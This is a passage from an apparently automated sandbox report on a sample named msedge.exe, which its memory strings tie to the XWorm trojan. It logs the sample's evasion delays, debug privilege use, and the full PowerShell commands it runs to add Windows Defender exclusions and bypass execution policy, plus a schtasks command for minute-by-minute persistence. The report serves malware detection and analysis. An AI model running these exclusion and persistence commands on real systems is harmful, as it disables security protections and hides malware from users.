                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599655s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599435s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599251s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -599008s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -598906s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5128Thread sleep count: 7600 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5128Thread sleep count: 1987 > 30
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 404Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 4252Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 1036Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 4980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\msedge.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599655Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599435Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599251Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599008Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWors"%SystemRoot%\system32\mswsock.dlliceModel, Version=4.
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                    Source: C:\Users\user\Desktop\msedge.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\msedge.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"Jump to behavior
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                    Source: C:\Users\user\Desktop\msedge.exeQueries volume information: C:\Users\user\Desktop\msedge.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
